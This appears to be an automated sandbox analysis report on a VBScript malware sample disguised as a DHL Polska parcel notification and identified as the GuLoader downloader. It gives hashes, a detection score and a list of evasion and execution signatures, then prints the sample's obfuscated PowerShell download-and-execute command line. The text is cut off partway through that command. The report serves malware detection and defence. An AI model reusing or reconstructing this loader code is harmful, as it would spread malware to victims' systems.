Edit tour
Windows
Analysis Report
DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs
Overview
General Information
Sample name: | DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbsrenamed because original name is a hash value |
Original sample name: | DHL Polska_Powiadomienie oprzesyce 28036893335.vbs |
Analysis ID: | 1466655 |
MD5: | 3b5b96bb9765b0c37f926296a205a2d6 |
SHA1: | 30ba62c4b319c4950bf70b83634bc8108c50c6da |
SHA256: | 31a8c9d6f61346b95e41ee64547aa6160932a0f740f4a712c26b6b7f1015a588 |
Tags: | DHLvbs |
Infos: | |
Detection
GuLoader
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7284 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\DHL P olska_Powi adomienie oprzesy#U0 142ce 2803 6893335.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 8096 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'Cygnid H emiteratic Orthodiag raphy217 M alleolar l ovreglens Aflbsledni nger Sagsa ktens Traa drullerne Nonscalar Nondeclara tory Yawnu ps Abet226 Stammefej derne33 Av itaminosis Aabenlyse s Fusionsm usikken Ea rthworms k ursusmodul et Bollede jene Rolle fag Eyras Windowshop ping Usr D isboscatio n91 Cygnid Hemiterat ic Orthodi agraphy217 Malleolar lovreglen s Aflbsled ninger Sag saktens Tr aadrullern e Nonscala r Nondecla ratory Yaw nups Abet2 26 Stammef ejderne33 Avitaminos is Aabenly ses Fusion smusikken Earthworms kursusmod ulet Bolle dejene Rol lefag Eyra s Windowsh opping Usr Disboscat ion91';If (${host}.C urrentCult ure) {$Cla iraudience ++;}Functi on Trosfll en($Gendig tende){$St atshemmeli ghedernes= $Gendigten de.Length- $Clairaudi ence;$Preh ensible='S UBsTRI';$P rehensible +='ng';For ( $Bilkber ne195=2;$B ilkberne19 5 -lt $Sta tshemmelig hedernes;$ Bilkberne1 95+=3){$Cy gnid+=$Gen digtende.$ Prehensibl e.Invoke( $Bilkberne 195, $Clai raudience) ;}$Cygnid; }function Extensiona lism($Medu llitis){ & ($Impoten s) ($Medul litis);}$C zardas=Tro sfllen ' O MVroM,zBai AalR.lA,a. e/St5no.Ko 0Ge Br(BaW Ini MnP,d, doMew esRe pNC TF, s p1Ta0 ,. E 0S.;Pn ,W ,iSknS 6En 4 l;Go Trx Sk6Fo4 ;f, FrGuvH :M a1L 2,a1.n .Pa0Re)B, GE,e.ecAn kWioH / G2 N.0an1St0. y0T,1.b0.s 1m. CFVei rr IeEnfLy oPrxSo/Co1 Ty2S,1 A. t0 D ';$Pr eassuring= Trosfllen ' aUH sKoe OprFa-neA, ugK,e nCot .k ';$lovr eglens=Tro sfllen 'D hHjtOct .p AcsOs:Tr/S a/Hod SrTe i,fvSkeS . GigL,o.ioh ygAxlTueB, . DcReo Cm Er/FiuP.c i?BeeAnxa. pSkoA,rVet I=BidP oC aw.in OlS. o qaOvdTr& LoiMad M=K o1 ey S-Un sBorArWMey t9P.W sPa TBox EODe0 SeaA.cUs2 FNJiV agAn 8 JA ,2,ea .U .mEonB iTRi3BeVSg qunyJ CP ' ;$Unhomolo gic=Trosfl len ' >Te ';$Impoten s=Trosflle n 'PeiUneS txUm ';$Aa rigt='Traa drullerne' ;$Database modellerne = Trosfll en 'B eTrc K.h,noMy K %U.a YpT p KvdChaHatB raUl% S\ o D,vesim,eo ,rcL.r.iaR etKniEasOl iStnDigNo. IS ppb.iC o W,&Bj&Ki E.eUncX h .oFo At H ';Extensi onalism (T rosfllen ' S$,ngH,lV ioKubSoa l M : bGrit. gRatCrhG.a Getu.c ah. r=.h(ZacFl m KdJ, Pa/ eceu E.$A nDBraTet , aSnb Aa Fs Kle AmR oE ld.eeOrlL, l,keA rMon FoeHe)lu ' );Extensio nalism (Tr osfllen 'K i$R gOsl a oPrbS aTul .r:K.MT.a, tlSylUneAu o TlSkaFar S,= ,$MelS oN v er , e rg .l ee T nC,sJr.m is ,pScl P iFot V( S$ MeUErn Ch .oAdmUroTe l.koH,g,bi Flcdi)co ' );Extensio nalism (Tr osfllen ' P[B.NHaeT, t .. .S .e FerB,vFoi. tcNoeT,POv oLiiChnSlt BiMRea Kn DaOkg.ieSa rC,] .:.i: DiSKleSpcS eu irSliIn tUny.iP Cr .eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl. BeSAteSocf ruMar OiEl t ay.oP Kr .noSutVeoS acKioCol U T fy.ip.ee